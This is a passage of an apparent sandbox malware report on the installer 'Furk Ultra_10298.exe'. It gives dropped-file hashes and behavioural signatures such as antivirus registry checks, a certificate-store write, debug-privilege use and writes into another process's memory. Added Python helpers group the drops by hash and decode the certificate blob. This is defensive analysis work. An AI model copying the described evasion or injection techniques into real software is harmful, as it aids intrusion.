SHA256 1d2019b69f9a5f4688172a676a01e1078e8903626b36ccd8dd329ee928b17cb8
SHA512 5a0598e2e473b5bcaa9de1fc23a2f20a4861a854f23862bbdde077835927b676000877fd9af0092d0f885c969590db62d37a352eaab958fa22b2cd57484098a8

\Program Files (x86)\Any Drive Formatter\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

C:\Program Files (x86)\Any Drive Formatter\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

memory/820-175-0x0000000000000000-mapping.dmp

memory/1476-176-0x0000000006450000-0x000000000720D000-memory.dmp

memory/1924-177-0x0000000000400000-0x0000000000414000-memory.dmp

memory/300-178-0x00000000035D0000-0x0000000004597000-memory.dmp

memory/1664-179-0x0000000000400000-0x00000000013C7000-memory.dmp

memory/1872-180-0x0000000003620000-0x0000000004738000-memory.dmp

memory/1080-181-0x0000000000400000-0x0000000001518000-memory.dmp

memory/2008-182-0x0000000000050000-0x00000000000B4000-memory.dmp

memory/2016-183-0x0000000000000000-mapping.dmp

memory/1664-184-0x0000000000400000-0x00000000013C7000-memory.dmp

memory/1664-185-0x0000000000400000-0x00000000013C7000-memory.dmp

memory/1080-186-0x0000000000400000-0x0000000001518000-memory.dmp

memory/1080-187-0x0000000000400000-0x0000000001518000-memory.dmp

memory/676-189-0x0000000000000000-mapping.dmp

memory/1080-191-0x0000000000400000-0x0000000001518000-memory.dmp

memory/1664-192-0x0000000000400000-0x00000000013C7000-memory.dmp

memory/1752-193-0x0000000000000000-mapping.dmp

memory/828-194-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1180-196-0x000000001B420000-0x000000001B4B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\InfoInstall\Newtonsoft.Json.dll

MD5 486015a44a273c6c554a27b3d498365c
SHA1 cb08f5d7240dfcdcd77de754259b36c0d9a2a034
SHA256 6a168461c721fd14163751f7839fb8d67483cb5831f1b2b1ab3e96a68b82d384
SHA512 1578ed43e815017c269d2a37bb9cdc16d51209bfa6bdb7276ad67cbb39955708826973ac7f48c795e6a1361e7d2a14b14b6cea02ee9ecf396a4b02313aada1d6

C:\Users\Admin\AppData\Roaming\InfoInstall\FileOperation.dll

MD5 e5d09907a04a7b97500654d71dd3b110
SHA1 445c074d92489b85047434ca6938d583c4ca33e8
SHA256 33b35e980bf35baaf23ee36e61ae2a758c6627e83e6ca447e67da85ca1062a94
SHA512 0cb70775859769be9a536c78abb8a728f2af554369397c8e252de566c05e15037ab4ee105e692915619799327e75609ee673866a353e3fff3dafb0d1f668ed37

memory/1924-197-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1180-199-0x00000000001E0000-0x00000000001E8000-memory.dmp

memory/1180-201-0x0000000000416000-0x0000000000435000-memory.dmp

memory/1180-202-0x00000000001F0000-0x00000000001FA000-memory.dmp

memory/2016-203-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmp

memory/1100-204-0x0000000000000000-mapping.dmp

memory/1244-206-0x0000000000000000-mapping.dmp

memory/1920-209-0x000000000C340000-0x000000000C496000-memory.dmp

memory/1104-210-0x0000000000000000-mapping.dmp

memory/1920-211-0x00000000008D0000-0x0000000000A2B000-memory.dmp

memory/1920-212-0x000000000C340000-0x000000000C496000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/2012-214-0x0000000000000000-mapping.dmp

memory/2012-217-0x00000000340E0000-0x00000000350E0000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/1180-222-0x00000000001F0000-0x00000000001FA000-memory.dmp

memory/1852-221-0x0000000000000000-mapping.dmp

memory/1372-223-0x0000000000000000-mapping.dmp

memory/516-224-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 91683d2e59257ebb56a11f6cb5167242
SHA1 800d8811265e5bce41b3f52523520bd011d1095f
SHA256 c7ec15e2be3668493eb19ab0e6ca280482df84fea1d7d34b20b7c0d92b8078ec
SHA512 3daf001fac0a966a78d764159610ea23b3e9175b9d51e2ff71667498509f8f15cab2b65eeaf2ce67f9c7ab04b7cb98ee67c67f439d7088cf13d770ea3619ed45

memory/1920-228-0x00000000008D0000-0x0000000000A2B000-memory.dmp

memory/2016-230-0x000007FEE9D90000-0x000007FEEA7B3000-memory.dmp

memory/516-229-0x000007FEE9D90000-0x000007FEEA7B3000-memory.dmp

memory/2016-231-0x0000000002334000-0x0000000002337000-memory.dmp

memory/516-232-0x0000000002844000-0x0000000002847000-memory.dmp

memory/516-233-0x000007FEE9170000-0x000007FEE9CCD000-memory.dmp

memory/2016-234-0x000007FEE9170000-0x000007FEE9CCD000-memory.dmp

memory/1920-235-0x0000000000000000-mapping.dmp

memory/792-236-0x0000000000000000-mapping.dmp

memory/1772-237-0x0000000000000000-mapping.dmp

memory/552-238-0x0000000000000000-mapping.dmp

memory/1492-239-0x0000000000000000-mapping.dmp

memory/1104-240-0x0000000000000000-mapping.dmp

memory/1852-241-0x0000000000000000-mapping.dmp

memory/1240-242-0x0000000000000000-mapping.dmp

memory/1240-244-0x000007FEE9D90000-0x000007FEEA7B3000-memory.dmp

memory/1240-245-0x000007FEE9170000-0x000007FEE9CCD000-memory.dmp

memory/1240-246-0x0000000002AB4000-0x0000000002AB7000-memory.dmp

memory/2016-247-0x0000000002334000-0x0000000002337000-memory.dmp

memory/516-248-0x0000000002844000-0x0000000002847000-memory.dmp

memory/1240-249-0x0000000002AB4000-0x0000000002AB7000-memory.dmp

memory/1980-250-0x0000000000000000-mapping.dmp

memory/1776-251-0x0000000000000000-mapping.dmp

memory/1604-252-0x0000000000000000-mapping.dmp

memory/1620-253-0x0000000000000000-mapping.dmp

memory/1944-254-0x0000000000000000-mapping.dmp

memory/1936-255-0x0000000000000000-mapping.dmp

memory/1076-256-0x0000000000000000-mapping.dmp

memory/1604-257-0x0000000000000000-mapping.dmp

memory/1112-258-0x0000000000000000-mapping.dmp

memory/1944-259-0x0000000000000000-mapping.dmp

memory/1980-260-0x0000000000000000-mapping.dmp

memory/1112-262-0x0000000000000000-mapping.dmp

memory/1960-263-0x0000000000000000-mapping.dmp

memory/1688-264-0x0000000000000000-mapping.dmp

memory/2076-265-0x0000000000000000-mapping.dmp

memory/2100-266-0x0000000000000000-mapping.dmp

memory/2132-267-0x0000000000000000-mapping.dmp

memory/2156-268-0x0000000000000000-mapping.dmp

memory/2196-269-0x0000000000000000-mapping.dmp

memory/2232-270-0x0000000000000000-mapping.dmp

memory/2960-272-0x000007FEE9D90000-0x000007FEEA7B3000-memory.dmp

memory/2960-273-0x000007FEE9170000-0x000007FEE9CCD000-memory.dmp

memory/2960-274-0x00000000026F4000-0x00000000026F7000-memory.dmp

memory/2960-275-0x00000000026F4000-0x00000000026F7000-memory.dmp

memory/2112-278-0x00000000343E0000-0x00000000353E0000-memory.dmp

memory/2112-284-0x0000000048950000-0x00000000489D5000-memory.dmp
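
The file list above records drop events, not unique files: the same SHA256 appears under the `\Users\...` and `C:\Users\...` forms of one path, and the same content appears under different names (5ByuM.exe and DOgvvll.exe both hash to MD5 c11030bd1b9b76d5371f5d3e42d7620f; the two `is-*.tmp\*.tmp` files share MD5 e3dcae5ee7ee62e603d2a37128861468, which together with the `_isetup\_shfoldr.dll` and `_iscrypt.dll` drops is consistent with two installers built with the same Inno Setup version). The Python below, added here as an example and not code from the report, the sandbox, or the sample, parses that flattened format and groups entries by SHA256 so an analyst works from unique payloads rather than drop events. The sample input is an excerpt re-typed from the entries above; folding `\Users\...` onto `C:\Users\...` is an assumption made for this example.

```python
"""Group a sandbox report's dropped-file list by content hash so the same payload
dropped under several names or paths is counted once.

Added example; not code from the report, the sandbox, or the sample. Assumed
input format (the flattened list above): a path line followed by "MD5 <hex>",
"SHA1 <hex>", "SHA256 <hex>", "SHA512 <hex>" lines, blank lines ignored;
"memory/<pid>-<n>-...dmp" lines are memory dumps and carry no hashes.
"""
import re
from collections import defaultdict

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
DRIVE_RE = re.compile(r"^[A-Za-z]:\\")

# Sample input: entries re-typed from the report above (SHA512 lines dropped for
# brevity; the parser accepts them). The first two lines exercise the edge cases:
# a hash line with no preceding path, and a memory-dump entry.
REPORT_EXCERPT = r"""
SHA512 53849bc22f8255158c2238c4cce7acca2b817d9e0fac2894cfc67cfad3e1325fb81267f834a15b3fe5f47ac4923730bf5a8f6c2da7dccf2b0a7a01c3606ca64b
memory/1952-89-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe
MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp
MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp
MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
MD5 b3dba6728cf861a741a710442088683a
SHA1 bf3a57590117cae01c9911f82c69dbe71e5968db
SHA256 a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
MD5 b3dba6728cf861a741a710442088683a
SHA1 bf3a57590117cae01c9911f82c69dbe71e5968db
SHA256 a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2
"""


def parse_files_section(text: str) -> list:
    """Return one dict per dropped-file entry: {"path": ..., "md5": ..., "sha1": ..., ...}."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m:
            if current is not None:      # a hash line before any path is a dangling tail
                current[m.group(1).lower()] = m.group(2).lower()
            continue
        if line.startswith("memory/"):   # memory dump: nothing to group on
            continue
        current = {"path": line}
        entries.append(current)
    return entries


def canonical_path(path: str) -> str:
    """Assumption for this example: the NT-style "\\Users\\..." and the "C:\\Users\\..."
    forms of a path in the report denote the same file; fold the former onto C:."""
    return path if DRIVE_RE.match(path) else "C:" + path


def group_by_sha256(entries: list) -> dict:
    """{sha256: {"md5": ..., "sha1": ..., "paths": sorted unique paths}}."""
    groups = defaultdict(lambda: {"md5": None, "sha1": None, "paths": set()})
    for e in entries:
        if "sha256" not in e:
            continue
        g = groups[e["sha256"]]
        g["md5"], g["sha1"] = e.get("md5"), e.get("sha1")
        g["paths"].add(canonical_path(e["path"]))
    return {h: {**g, "paths": sorted(g["paths"])} for h, g in groups.items()}


def renamed_payloads(groups: dict) -> set:
    """SHA256s dropped under more than one file name (same content, different name)."""
    return {h for h, g in groups.items()
            if len({p.rsplit("\\", 1)[-1] for p in g["paths"]}) > 1}


if __name__ == "__main__":
    by_hash = group_by_sha256(parse_files_section(REPORT_EXCERPT))
    for sha256, g in sorted(by_hash.items()):
        print(sha256, g["md5"], *g["paths"], sep="\n  ")
    print("renamed:", sorted(renamed_payloads(by_hash)))
```

Running it on the full Files list reduces the several dozen entries above to a handful of unique hashes; the hashes returned by `renamed_payloads` are the ones worth a second look, because a dropper that writes one binary under two random names is usually staging the same payload from two paths.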

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win7-20221111-en

Max time kernel

107s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\setup10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A (23 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\setup10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe N/A (12 identical rows)

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\Version C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast\Version C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A

Checks installed software on the system

discovery

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
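
The Blob value in the row above is CryptoAPI's serialized certificate-context format: a sequence of (property id, reserved, length, data) records, the last of which (CERT_CERT_PROP_ID) carries the DER certificate itself. Decoding it shows what was actually written: the friendly-name property reads "Baltimore CyberTrust Root", the SHA-1 property equals the registry key name D4DE20D05E66FC53FE1A50882C78DB2852CAE474, the enhanced-key-usage property is serverAuth, and the certificate's validity runs from 2000-05-12 to 2025-05-12. That is a root from Microsoft's root program landing in the AuthRoot store, which is where Windows' automatic root update caches roots it fetches the first time a TLS chain ending in them is built; crypt32 does that write inside the calling process, which is why the sandbox attributes it to GenericSetup.exe. On its own this row is therefore weak evidence of certificate-store tampering. The signal to look for is a thumbprint or friendly name that is not a root-program CA, or a write to the Root store (HKLM or HKCU `SystemCertificates\Root`) rather than AuthRoot. The Python below, added as an example and not code from the sandbox or from the sample, performs that decode with the standard library only; the property-id names are the CERT_*_PROP_ID constants from wincrypt.h, and the sample input is the key name and Blob value copied from the row above.

```python
"""Decode a CryptoAPI certificate Blob of the kind written under
HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\<sha1>\\Blob.

Added example; not code from the sandbox or the analysed sample. Property names
are the CERT_*_PROP_ID constants from wincrypt.h (only those present in this blob
are listed); KEY_THUMBPRINT and BLOB_HEX are copied from the report row above.
"""
import hashlib
import struct

PROP_NAMES = {
    3: "CERT_SHA1_HASH_PROP_ID",
    9: "CERT_ENHKEY_USAGE_PROP_ID",
    11: "CERT_FRIENDLY_NAME_PROP_ID",
    15: "CERT_SIGNATURE_HASH_PROP_ID",
    20: "CERT_KEY_IDENTIFIER_PROP_ID",
    25: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    29: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    32: "CERT_CERT_PROP_ID",
    83: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
}
KEY_THUMBPRINT = "D4DE20D05E66FC53FE1A50882C78DB2852CAE474"
BLOB_HEX = (
    "19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d0101050"
    "5000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9"
)


def parse_cert_blob(blob: bytes) -> dict:
    """Records of propid (u32 LE), reserved (u32 LE, always 1), length (u32 LE), data.
    Returns {propid: data}; a truncated final record yields whatever bytes are there."""
    props, off = {}, 0
    while off + 12 <= len(blob):
        prop_id, _reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def der_tlvs(data: bytes):
    """Yield (tag, value) for consecutive DER TLVs, long-form lengths included."""
    off = 0
    while off + 2 <= len(data):
        tag, length = data[off], data[off + 1]
        off += 2
        if length & 0x80:                  # long form: low 7 bits = number of length bytes
            n = length & 0x7F
            length = int.from_bytes(data[off:off + n], "big")
            off += n
        yield tag, data[off:off + length]
        off += length


def decode_oid(body: bytes) -> str:
    """OBJECT IDENTIFIER contents: first byte packs arcs 1 and 2, rest are base-128."""
    parts, val = [body[0] // 40, body[0] % 40], 0
    for c in body[1:]:
        val = (val << 7) | (c & 0x7F)
        if not c & 0x80:                   # high bit clear ends a sub-identifier
            parts.append(val)
            val = 0
    return ".".join(map(str, parts))


def decode_eku(der: bytes) -> list:
    """ExtKeyUsageSyntax ::= SEQUENCE OF OBJECT IDENTIFIER."""
    if not der:
        return []
    _tag, seq = next(der_tlvs(der))
    return [decode_oid(v) for t, v in der_tlvs(seq) if t == 0x06]


def cert_validity(der: bytes) -> tuple:
    """notBefore/notAfter of an X.509 certificate as the raw UTCTime strings."""
    _tag, cert_body = next(der_tlvs(der))          # Certificate SEQUENCE
    _tag, tbs_body = next(der_tlvs(cert_body))     # TBSCertificate SEQUENCE
    tbs = list(der_tlvs(tbs_body))
    idx = 1 if tbs[0][0] == 0xA0 else 0            # optional [0] EXPLICIT version first,
    # then serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo, ...
    return tuple(v.decode("ascii") for _, v in der_tlvs(tbs[idx + 3][1]))


def summarise_blob(blob_hex: str, key_thumbprint: str) -> dict:
    props = parse_cert_blob(bytes.fromhex(blob_hex))
    cert = props.get(32, b"")
    sha1_prop = props.get(3, b"").hex()
    return {
        "properties": [PROP_NAMES.get(p, f"prop_{p}") for p in sorted(props)],
        "friendly_name": props.get(11, b"").decode("utf-16-le").rstrip("\x00"),
        "sha1_prop": sha1_prop,
        "key_matches_sha1_prop": sha1_prop == key_thumbprint.lower(),
        "eku_oids": decode_eku(props.get(9, b"")),
        "validity": cert_validity(cert) if cert else None,
        "cert_len": len(cert),
        # True only if the DER survived intact: SHA-1 over it must equal property 3.
        "cert_sha1_matches_prop": hashlib.sha1(cert).hexdigest() == sha1_prop,
    }


if __name__ == "__main__":
    for key, value in summarise_blob(BLOB_HEX, KEY_THUMBPRINT).items():
        print(f"{key}: {value}")
```

The `cert_sha1_matches_prop` field is the integrity check: if the SHA-1 of the embedded DER equals the thumbprint property and the key name, the blob is a faithfully serialized copy of that certificate, and the analyst can compare the thumbprint against the Microsoft root program list instead of treating every AuthRoot write as tampering.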

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A (17 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A (24 identical rows)
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1748 wrote to memory of 536 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 536 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe
